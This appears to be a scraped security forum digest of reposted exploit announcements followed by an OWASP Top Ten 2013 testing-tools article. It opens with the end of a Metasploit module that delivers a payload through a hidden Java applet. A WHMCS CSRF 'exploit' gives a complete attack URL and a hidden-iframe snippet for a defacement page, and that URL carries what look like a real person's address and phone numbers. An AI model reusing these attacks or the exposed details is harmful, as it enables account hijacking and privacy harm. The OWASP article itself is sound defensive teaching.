      jar.add_file("#{@exploit_class_name}.class", @exploit_class)
      jar.add_file("ExpProvider.class", @provider_class)
      jar.add_file("DisableSecurityManagerAction.class", @action_class)
      randomize_identifier_in_jar(jar, "metasploit")
      randomize_identifier_in_jar(jar, "payload")
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    html = %Q|
    <html>
    <body>
    <applet archive="#{rand_text_alpha(rand(5) + 3)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
    </body>
    </html>
    |
    return html
  end
end

Sursa: Java Applet ProviderSkeleton Insecure Invoke Method ? Packet Storm
  20. PHP-CGI Argument Injection Authored by infodox Exploit for the PHP-CGI argument injection vulnerability disclosed in 2012. Has file uploading, inline shell spawning, and both python and perl reverse shell implementations using an earlier version of the "payload" library written for such exploits. Download: http://packetstormsecurity.com/files/download/122162/phpcgi.tar.gz Sursa: PHP-CGI Argument Injection ? Packet Storm
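The archive above is the actual exploit; purely as an illustration of the underlying bug class (CVE-2012-1823, where a query string containing no '=' is passed to php-cgi as command-line switches), here is a minimal, hypothetical detection sketch in Python. The target URL is a placeholder, and the '?-s' switch merely asks PHP to return the script's highlighted source, which is the usual non-destructive way to confirm the flaw on systems you are authorized to test.

# phpcgi_check.py - minimal probe for the PHP-CGI argument injection bug class (CVE-2012-1823)
# Illustrative sketch only (Python 3 standard library); not the exploit from the archive above.
import urllib.request

def source_disclosed(url):
    """Request url with '?-s'; vulnerable php-cgi setups return syntax-highlighted PHP source."""
    probe = url + "?-s"   # without an '=', the query string is handed to php-cgi as a CLI switch
    with urllib.request.urlopen(probe, timeout=10) as resp:
        body = resp.read(65536).decode("utf-8", errors="replace")
    # highlight output wraps the file in <code> tags and HTML-encodes the opening <?php tag
    return "<code>" in body and "&lt;?php" in body

if __name__ == "__main__":
    target = "http://victim.example/index.php"   # placeholder - test only systems you own
    print("possible source disclosure" if source_disclosed(target) else "no source disclosure observed")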
  21. Plesk PHP Code Injection Authored by Kingcope, infodox Reliable exploit for the Plesk PHP code injection vulnerability disclosed by Kingcope in June 2013. Can deliver inline and reverse shells using the payloads library, as well as offering (buggy) file upload features. Download: http://packetstormsecurity.com/files/download/122163/plesk-php.tar.gz Sursa: Plesk PHP Code Injection ? Packet Storm
  22. WHMCS Cross Site Request Forgery ########################################################################### # Exploit Title: WHMCS [CSRF] All Versions (0day) # Team: MaDLeeTs # Software Link: http://www.whmcs.com # Version: All # Site: http://www.MaDLeeTs.com # Email: LeeTHaXor@Y7Mail.com #######################Video####################################### http://vimeo.com/63686629 ########################################################################### https://[TARGETS WEBHOST]/clientarea.php?action=details&save=true&firstname=Max&lastname=Fong&companyname=Antswork+Communications+Sdn+Bhd&email=[ YOUR EMAIL ADDRESS ]&address1=B10-12,+Endah+Puri+Condominium,&address2=Jalan+3/149E,+Taman+Seri+Endah+&city=Seri+Petaling&state=Wilayah+Persekutuan&postcode=57000&country=MY&phonenumber=0060390592663&paymentmethod=none&billingcid=0&customfield[1]=max@antswork.com&customfield[2]=&customfield[3]=+6019.3522298&customfield[4]=+603.90578663&customfield[5]=Laura+-+0192182996&customfield[6]=Owner+of+Company&customfield[7]=&customfield[8]=&customfield[9]=Old+Contact+Details:+A2-11-8,+Vista+Komanwel+A2+Bukit+Jalil+57700+Kuala+Lumpur+Tel:+603.86560268+Fax:+603.8?6560768 ########################iFrame Code To Add On Deface############################## <IFRAME src="[Exploit Code]" width="1" height="1" scrolling="auto" frameborder="0"></iframe> Example: <IFRAME src="https://manage.fatservers.my/clientarea.php?action=details&save=true&firstname=Max&lastname=Fong&companyname=Antswork+Communications+Sdn+Bhd&email=LeeTHaxor%40Y7Mail.Com&address1=B10-12%2C+Endah+Puri+Condominium%2C&address2=Jalan+3%2F149E%2C+Taman+Seri+Endah+&city=Seri+Petaling&state=Wilayah+Persekutuan&postcode=57000&country=MY&phonenumber=0060390592663&paymentmethod=none&billingcid=0&customfield%5B1%5D=max%40antswork.com&customfield%5B2%5D=&customfield%5B3%5D=%2B6019.3522298&customfield%5B4%5D=%2B603.90578663&customfield%5B5%5D=Laura+-+0192182996&customfield%5B6%5D=Owner+of+Company&customfield%5B7%5D=&customfield%5B8%5D=&customfield%5B9%5D=Old+Contact+Details%3A+A2-11-8%2C+Vista+Komanwel+A2+Bukit+Jalil+57700+Kuala+Lumpur+Tel%3A+603.86560268+Fax%3A?+603.86560768" width="1" height="1" scrolling="auto" frameborder="0"></iframe> ########################################################################### All you need to do is add it into your Deface page and make your target view the deface page, He MUST loggin 1st into his clientarea in order to get his email updated. ########################################################################### Greetz to : H4x0rL1f3 | KhantastiC HaXor | H4x0r HuSsY | b0x | Invectus | Shadow008 | Neo HaXor | Hitcher | Dr.Z0mbie | Hmei7 | phpBugz | MindCracker | c0rrupt | r00x | Pain006 | Ment@l Mind | M4DSh4k | H1d@lG0 | AlphaSky | 3thicaln00b | e0fx | madc0de | makman | DeaTh AnGeL | Lnxr00t | x3o-1337 | Tor Demon | T4p10N | AL.MaX HaCkEr | | ThaRude | ThaDark | Evil-DZ | H3ll-dz | Over-X | 3xp1r3 Cyber Army | Pakistan Cyber Army And All MaDLeeTs TeaM Members ########################################################################### http://www.MaDLeeTs.com ########################################################################### Sursa: WHMCS Cross Site Request Forgery ? Packet Storm
  23. Encryption At The Software Level: Linux And Windows

Description: In this video, Mark Stanislav from Due Security discusses encryption for Linux, and Farooq Ahmed, Development Manager at Online Tech, discusses encryption for Windows.

Encryption: changing plain text into cipher text in order to make the original data unreadable to anyone who does not possess the decryption algorithm and any required key.

For More Information Please Visit: Compliant Cloud | Colocation | Managed Servers | Disaster Recovery

Sursa: Encryption At The Software Level: Linux And Windows
  24. Ssl Traffic Analysis Attacks - Vincent Berg

Description: The talk focuses on modern SSL traffic analysis attacks. Although the technique is well known and excellent papers have been published about it, most people are still not aware of the lengths an attacker will go to in order to extract useful information from SSL sessions. By showing some large targets and some useful progress in that space, the talk aims to give the audience a better understanding of what SSL traffic analysis is, why it is a real threat (depending on the skills of the assumed adversary), and how to try to avoid these types of attacks. Several research tools accompany the talk, including at least one proof of concept for performing traffic analysis on Google Maps.

For more information, please visit: Breakpoint 2012 Speakers List

Sursa: Ssl Traffic Analysis Attacks - Vincent Berg
  25. [h=1]OWASP Top Ten Testing and Tools for 2013[/h]

Jonathan Lampe, June 27, 2013

In 2013 OWASP completed its most recent regular three-year revision of the OWASP Top 10 Web Application Security Risks. The Top Ten list has been an important contributor to secure application development since 2004, and was further enshrined after it was included by reference in the Payment Card Industry Security Standards Council's Data Security Standards, better known as the PCI-DSS.

Surprisingly, there were only a few changes between the 2010 Top Ten and 2013 Top Ten lists, including one addition, several reorders and some renaming. The most prevalent theme was probably that both cross-site scripting (XSS) and cross-site request forgery (CSRF) dropped in importance: XSS dropping apparently because safer scripting libraries are becoming more widespread, and CSRF dropping because these vulnerabilities are not as common as once thought.

In any case, the current entries in the OWASP Top Ten Web Application Security Risks for 2013 are:

[*] A1: Injection
Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data. (A short worked example follows the tool table below.)

[*] A2: Broken Authentication and Session Management
Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or exploit other implementation flaws to assume other users' identities.

[*] A3: Cross-Site Scripting (XSS)
XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

[*] A4: Insecure Direct Object References
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.

[*] A5: Security Misconfiguration
Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server and platform. All these settings should be defined, implemented and maintained, as many are not shipped with secure defaults. This includes keeping all software up to date.

[*] A6: Sensitive Data Exposure
Many web applications do not properly protect sensitive data, such as credit cards, SSNs, tax IDs and authentication credentials. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud or other crimes. Sensitive data deserves extra protection such as encryption at rest or encryption in transit, as well as special precautions when exchanged with the browser.

[*] A7: Missing Function Level Access Control
Virtually all web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access unauthorized functionality.

[*] A8: Cross-Site Request Forgery (CSRF)
A CSRF attack forces a logged-on victim's browser to send a forged HTTP request, including the victim's session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim's browser to generate requests the vulnerable application thinks are legitimate requests from the victim.

[*] A9: Using Components with Known Vulnerabilities
Vulnerable components, such as libraries, frameworks, and other software modules, almost always run with full privilege. So, if exploited, they can cause serious data loss or server takeover. Applications using these vulnerable components may undermine their defenses and enable a range of possible attacks and impacts.

[*] A10: Unvalidated Redirects and Forwards
Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.

This is the fourth edition of a list that comes out every three years, and with the limited changes between 2010 and 2013 it is fair to say that OWASP's popular Top Ten list has matured. With maturity and popularity, automation and utilities that directly address the items on the list have arrived, and some of the best are summarized in the chart below.

[TABLE]
[TR][TD]WEB APPLICATION RISK[/TD][TD]SECURITY UTILITY[/TD][/TR]
[TR][TD]A1: Injection[/TD][TD]SQL Inject Me and Zed Attack Proxy (ZAP)[/TD][/TR]
[TR][TD]A2: Broken Authentication and Session Management[/TD][TD]ZAP[/TD][/TR]
[TR][TD]A3: Cross-Site Scripting (XSS)[/TD][TD]ZAP[/TD][/TR]
[TR][TD]A4: Insecure Direct Object References[/TD][TD]HTTP Directory Traversal Scanner, Burp Suite and ZAP[/TD][/TR]
[TR][TD]A5: Security Misconfiguration[/TD][TD]OpenVAS and WATOBO[/TD][/TR]
[TR][TD]A6: Sensitive Data Exposure[/TD][TD]Qualys SSL Server Test[/TD][/TR]
[TR][TD]A7: Missing Function Level Access Control[/TD][TD]OpenVAS[/TD][/TR]
[TR][TD]A8: Cross-Site Request Forgery (CSRF)[/TD][TD]Tamper Data (Samurai WTF), WebScarab or ZAP[/TD][/TR]
[TR][TD]A9: Using Components with Known Vulnerabilities[/TD][TD]OpenVAS[/TD][/TR]
[TR][TD]A10: Unvalidated Redirects and Forwards[/TD][TD]ZAP[/TD][/TR]
[/TABLE]

Those of you who read Russ McRee's 2010 Top Ten security tools article will notice that most of the tools listed here were also identified in his 2010 survey. However, my approach differs from McRee's in terms of breadth; whereas McRee aimed to provide a different tool for each of the top ten items, I aim to provide you with a smaller number of tools that should cover most of the top ten so you can concentrate your efforts on mastering fewer tools that do more.

Along those lines, it is worth noting that several of my recommended tools, notably the Zed Attack Proxy (ZAP) and new entrant OpenVAS, have increased the breadth of their services to cover more Top Ten items since their original release. In fact, it may be worth taking a closer look at additional capabilities of any recommended tool on this list because many of these tools are still under active development. (For example, WATOBO now has a SQL injection probe, although I haven't explored it far enough to recommend it yet.)
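The worked example promised under A1 above: a minimal, self-contained Python/sqlite3 sketch (the table and values are invented for the illustration) showing the string-concatenation pattern that injection scanners hunt for, next to the parameterized form that defeats it.

# injection_demo.py - why A1 (Injection) happens, and the parameterized fix (illustrative only)
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, is_admin INTEGER)")
conn.execute("INSERT INTO users VALUES ('alice', 0), ('bob', 1)")

user_input = "' OR '1'='1"   # hostile data an attacker would type into a form field

# Vulnerable: untrusted data is concatenated straight into the query text
query = "SELECT name FROM users WHERE name = '" + user_input + "'"
print("concatenated:  ", conn.execute(query).fetchall())   # returns every row

# Safe: the driver sends the value separately, so it can never change the query's structure
print("parameterized: ",
      conn.execute("SELECT name FROM users WHERE name = ?", (user_input,)).fetchall())   # []

Tools such as SQL Inject Me and ZAP essentially automate the first pattern with thousands of hostile inputs and watch how the application responds.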
[h=1]Two Main Types of Web Vulnerability Tools[/h]

If you scan the chart you will notice that two tools are mentioned the most: OWASP's Zed Attack Proxy (ZAP) and OpenVAS. These two tools represent two different classes of application scanning that every security researcher should become familiar with.

First, there are the tools that look for common misconfigurations and outdated software, including default settings, sample content, insecure configurations, and old versions that harbor known vulnerabilities. These tools are represented in the chart above by OpenVAS, an open source project with several heavyweight sponsors, including the government of Germany. Similar tools include Tenable's Nessus and eEye Digital Security's Retina, plus perhaps two dozen more actively developed open source projects and commercial products.

Second, there are the tools that help dig into specific web applications by automating SQL injection, authentication, session, XSS, directory traversal, redirect and other probes for common and serious vulnerabilities. These tools are represented in the chart above by ZAP. Most of these tools, including ZAP, use a combination of a local web proxy, a web session recorder, web playback and thousands of variations on input manipulation to look for vulnerabilities. Similar tools include HP WebInspect, IBM AppScan (originally by Watchfire), dozens of other general-purpose web vulnerability scanners and hundreds of special-case utilities.

[h=1]Other Web Vulnerability Tools[/h]

In addition to these two main types of tools, most security practitioners will find themselves drawn to additional tools that allow them to dig further into certain classes of vulnerabilities. For example, the "other tools" in my list were selected to cover areas where I worried about the thoroughness of my main tools, or where I wanted a second pair of eyes because of the risk. Your list of "other tools" will vary depending on the specific capabilities of your main tools, the needs of your clients or employer, your available operating systems and many other factors, but I selected mine for a few specific reasons.

SQL Inject Me for #1 Injection – Although ZAP covers this, I selected a second tool to give me a second pair of eyes on this most common and deadly of vulnerabilities. (I never want to be caught with my pants down on OWASP's #1 vulnerability.)

HTTP Directory Traversal Scanner and Burp Suite for #4 Insecure Direct Object References – Although ZAP also covers this item, I like the breadth of scanning and the output provided by either of these tools much more than ZAP's.

WATOBO for #5 Security Misconfiguration – This is the highest-rated item that known-vulnerability scanners like OpenVAS can detect. I wanted a second pair of eyes to make sure I am detecting more configuration issues, and to get a second opinion on questionable detects.

Qualys SSL Server Test for #6 Sensitive Data Exposure – This could be my most controversial recommendation, but having dealt with the innards of SSL/TLS while developing several security products (including going through the FIPS 140 validation process with three different companies), I always feel like I have an incomplete picture of my SSL/TLS capabilities until I hit my app with Qualys's SSL Server Test. None of the other local tests I've found (or written on my own) have quite the breadth of this hosted test.
Tamper Data (Samurai WTF) and WebScarab for #8 Cross-Site Request Forgery (CSRF) – CSRF vulnerabilities can be surprisingly hard to pin down, because what often looks like a detect turns out to be false positive, and what looks like a clean access denial often really changes something interesting on the backend. To chase these vulnerabilities down (to the point where they are reproducible) you usually need to master a local web proxy that can help you manipulate specific fields. Two of the best are Tamper Data and WebScarab, and you will often find yourself switching to your favorite proxy after your main tool registers an initial detect. (Yes, I know ZAP is also a proxy, but it’s not my favorite proxy; it’s my favorite detector.) One other tool that web security practitioners should be familiar with is OWASP’s WebGoat package. This tool isn’t a scanner, probe or proxy: instead, WebGoat is an intentionally insecure web application that we can probe with these and other web security tools. [h=1]Specific Web Vulnerability Applications (Main Tools)[/h] [h=2]Deep Probe Into Specific Applications: OWASP’s Zed Attack Proxy (ZAP)[/h] (Probes for Cross-Site Scripting, Injection, Sessions, Directory Traversal, Unvalidated Redirects and Forwards, and acts as a web proxy to locate CSRF and similar vulnerabilities.) OWASP has recently sponsored the development of its own web application vulnerability scanner called the Zed Attack Proxy (or ZAP for short). It automatically spiders a target URL and looks for common vulnerabilities, especially issues with cookies, headers and cross-scripting. [h=3]Installing and Running Zed Attack Proxy[/h] Download and install the program from http://code.google.com/p/zaproxy/downloads/list Run the program from your Start menu When prompted, use the wizard to create an “SSL root certificate” Type in the URL of a target application in the “URL to attack” field on the “Quick Start” tab To avoid unwanted attention until you know what you’re doing, please stick to “http://localhost” URLs, such as your local copy of WebGoat Much of the power of ZAP comes from using it as an “inline” proxy rather than as an interactive application. To try this mode: Open “Tools | Options | Local proxy” and set the proxy port to an acceptable value (8080 is the default, but if you’re running multiple proxies and web applications on your local machine, things can get a little crowded). Open your web browser and set its proxy settings to “localhost” and port 8080 (or whatever you configured). Browse to a few sites in the web browser. Flip back to ZAP. Notice that the sites you visited (and a few referenced through advertisements and inclusions) are now listed in ZAP’s “Sites” list. Click the “History” tab in the lower half of ZAP. This will show the URLs that caused content to be added to ZAP’s “Sites” list. Once you have started to gather URLs in your sites list, you can expand, gather more information about or actively attack them. In the “Sites” tab, find a URL of a web page that you recognize on a site that you know has more content. Select it and then click the “play” icon on the “Spider” tab at the bottom of the screen to follow the links on the page. To look for SQL Injection or XSS vulnerabilities in a page, select the URL in the “Sites” tab and right-click it to list “Attack” options. To set your attack options (e.g. to just check for XSS and avoid SQL injection attacks), select “Analyse | Scan Policy…” to turn various tests on and off. 
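Because most of ZAP's value comes from the traffic that flows through it, it can be handy to drive a browsing session from a script rather than by hand. The following is a hypothetical sketch using the third-party requests package; it assumes ZAP is listening on localhost:8080 (the default discussed above) and uses the local WebGoat instance covered later in the article as the target, so every request shows up in ZAP's "Sites" and "History" tabs.

# feed_zap.py - push scripted traffic through a local intercepting proxy (assumed at localhost:8080)
# so the visited pages populate ZAP's "Sites"/"History" tabs. Requires the 'requests' package.
import requests

PROXIES = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080",
}

urls = [
    "http://localhost/WebGoat/attack",   # local practice target; adjust to your own setup
]

session = requests.Session()
session.proxies.update(PROXIES)
session.verify = False   # the proxy re-signs HTTPS traffic with ZAP's generated root certificate

for url in urls:
    resp = session.get(url, auth=("guest", "guest"), timeout=10)
    print(resp.status_code, url)

Once the pages are in the Sites list, the spider and active scan options described above can be run against them.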
[h=2]Bad Configuration and Old Software Scanner: OpenVAS[/h] (Probes for Security Misconfiguration, Missing Function Level Access Control, Using Components with Known Vulnerabilities.) I took my original formal security training in the late 1990s so I “grew up” on Nessus when it was still a free security scanning application. Since its switch to a commercial application, a handful of forks of the original Nessus code have carried on Nessus’s original promise of a free remote security scanner. My favorite alternative to Nessus these days is the OpenVAS project, which counts among its backers the national government of Germany. As noted in my chart above, this project is best at finding security misconfigurations, missing function level access controls (formerly known as “failure to restrict URL access”) and components with known vulnerabilities. It includes some SQL injection and other probes to test application input, but since it is mainly designed to scan networks for machines with bad configuration and outdated software, I think you should use it the same way. Installing and Running OpenVAS The OpenVAS software is available for several popular Linux distributions including CentOS, Fedora and Red Hat Enterprise Linux. It is also available on virtual appliances for Oracle VirtualBox and EMC VMware. Once installed, a web-based interface is available to guide you through the scanning process. You’ve likely seen the types of reports that this application generates before: rating findings by severity, and ranking multiple machines from least secure to most secure depending on the number and severity of findings on each machine. For more information, please see: http://www.openvas.org/ [h=1]Other Top Ten Web Application Vulnerabilities Utilities[/h] [h=2]Injection Utility: Security Compass’s SQL Inject Me[/h] Even if you have moved to Chrome or Safari for your daily web browsing, it’s hard to give up Firefox entirely because of its extensive library of add-ons. One of the best SQL injection tools available today is a Firefox add-on called “SQL Inject Me” from Security Compass. [h=3]Installing and Running SQL Inject Me[/h] Install and run the latest version of Firefox (I am currently using v20). Install the add on from: https://addons.mozilla.org/En-us/firefox/addon/sql-inject-me/ After installing the SQL Inject Me plug-in, follow these directions to use it: Navigate to the page or application you want to test. Right-click on the target page and select “Open SQL Inject Me Sidebar”. Once the side-bar is open, use the drop-down and buttons to perform specific attacks. [h=2]Advanced Web Proxy and CSRF Utility: OWASP WebScarab[/h] OWASP’s WebScarab is a Java-based web proxy that displays and allows you to manipulate the specific fields that are passed between browser and server. It is highly extensible, but you often need to know what you want to chase after and how to code to chase it with this tool. Further muddying this project is the fact that a “next generation” edition was started but has not been touched since 2011. For more information, please see: https://www.owasp.org/index.php/WebScarab_Getting_Started or https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project [h=2]Insecure Direct Object Reference Utility: Burp Suite[/h] In 2010, Russ McRee’s 2010 security tools article went into detail about how to use the Burp Suite to ferret out path and directory traversal issues. 
Path and directory traversal issues have been problematic for web servers and web applications since their inception, perhaps most famously in the 2000 IIS vulnerability that fed worms such as Nimda. Rather than repeat McRee's work with Burp Suite, I will just agree that Burp Suite is good.

For more information, please see: http://portswigger.net/burp/

[h=2]Insecure Direct Object Reference Utility: HTTP Directory Traversal Scanner[/h]

Another tool that I like for directory traversal issues is the free HTTP Directory Traversal Scanner by John Leitch, an independent application security consultant in Michigan. This tool hits a given URL with about ten thousand URL variants in an attempt to find a named file. It helpfully groups its results by return code and content, which makes it easy to find needles in haystacks.

For more information, please see: http://www.autosectools.com/Page/HTTP-Directory-Traversal-Scanner

[h=2]Security Misconfiguration Utility: WATOBO[/h]

Russ McRee's 2010 security tools article uses WATOBO to look for security misconfiguration issues, and the tool is still a good choice: it's open source and maintained by an active community.

For more information, please see: http://sourceforge.net/apps/mediawiki/watobo/index.php?title=Main_Page

[h=2]Sensitive Data Exposure Utility: Qualys SSL Server Tester[/h]

I normally avoid web-based tools for application scanning for several reasons: the results may not be reported back only to me, the tools might be pulled or changed at any time, and they need to hit an Internet-facing application. However, I recommend Qualys's SSL Server Tester page to test the quality of your web application's HTTPS connection before and after deployment into production. Qualys tests for basic quality issues such as whether your server supports SSL 2.0, which ciphers are supported, and the strength of your server certificate. It also tests more advanced quality measures such as whether or not client-initiated renegotiation is allowed and whether or not the BEAST attack would be mitigated.

For more information, please see: https://www.ssllabs.com/ssltest/index.html (This is a resource hosted by a third party. For maximum protection, only allow traffic from "ssllabs.com" to the target resource until the necessary issues are resolved.)

[h=2]CSRF Utility: Tamper Data (Samurai WTF)[/h]

A Tamper Data utility is available in the Samurai WTF collection and is part of Russ McRee's coverage of CSRF utilities in his 2010 security tools review. The "Tamper Data" plug-in for Firefox is not currently recommended because of ongoing stability issues with recent versions of Firefox. Instead, I currently recommend configuring Firefox (or Chrome or any other web browser) to use a web proxy such as WebScarab or ZAP, and then using the functions within the web proxy to manipulate individual cookies, headers, form fields and URLs.

[h=2]WebGoat: The Perfect Target[/h]

In addition to the top ten web vulnerability list, OWASP develops and distributes software that allows students and security professionals to practice their skills against a deliberately insecure web application. The name of OWASP's tilting dummy is "WebGoat," and it is available in both .NET and Java editions.

[h=3]How to Download, Install and Set Up WebGoat on Windows[/h]

Although there is a .NET edition of WebGoat available for Windows platforms, I'll stick with the Java edition in this article because that edition supports Linux and Mac OS platforms in addition to Windows.
The Java edition also appears to be the more actively developed of the two, as its official ambitions include growing into a security benchmarking platform and a honeypot.

[h=3]WebGoat Prerequisites[/h]

The Java edition of WebGoat requires Java, of course, and uses Tomcat to provide its web interface.

[*] Download and install Oracle Java from http://www.java.com
Java Version 1.6 (a.k.a. "Java 6") is recommended
[*] Download and install Tomcat from http://tomcat.apache.org/
Tomcat Version 6 is recommended
Tomcat Version 7 is supported but requires additional setup not documented here
Once installed, open http://localhost:8080/ to confirm that Tomcat is working
Once you confirm the service is working, stop the Tomcat service

[h=3]How to Install WebGoat[/h]

[*] Download and unzip WebGoat from http://code.google.com/p/webgoat/downloads/list
Download the "Zip" file and unpack the contents into a local folder
[*] Open your local folder and double-click "webgoat.bat"
A Java window labeled "Tomcat" will open and display messages
Once the "Server startup in XXXXX ms" message appears, open http://localhost to confirm that you are hitting a live Tomcat application on port 80
Next, test WebGoat by opening http://localhost/WebGoat/attack. Sign on with username "guest" and password "guest" when prompted.

[h=3]How to Run WebGoat[/h]

Start WebGoat by opening http://localhost/WebGoat/attack. Sign on with username "guest" and password "guest" when prompted. Click the "Start WebGoat" button. (A small scripted check of this setup appears below.)

Sursa: InfoSec Institute Resources – OWASP Top Ten Testing and Tools for 2013
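The scripted check mentioned at the end of the run instructions: a small, hypothetical helper (Python standard library only) that confirms the local WebGoat install responds the way the steps above expect, using the default guest/guest credentials. The expected status codes are assumptions about a default Tomcat basic-auth setup.

# webgoat_smoketest.py - confirm the local WebGoat install responds as the steps above expect
import base64
import urllib.error
import urllib.request

def status(url, user=None, password=None):
    """Return the HTTP status code for url, optionally sending Basic auth credentials."""
    req = urllib.request.Request(url)
    if user is not None:
        token = base64.b64encode(f"{user}:{password}".encode()).decode()
        req.add_header("Authorization", "Basic " + token)
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code

# Expect 401 without credentials and 200 once guest/guest is supplied.
print("no credentials ->", status("http://localhost/WebGoat/attack"))
print("guest/guest    ->", status("http://localhost/WebGoat/attack", "guest", "guest"))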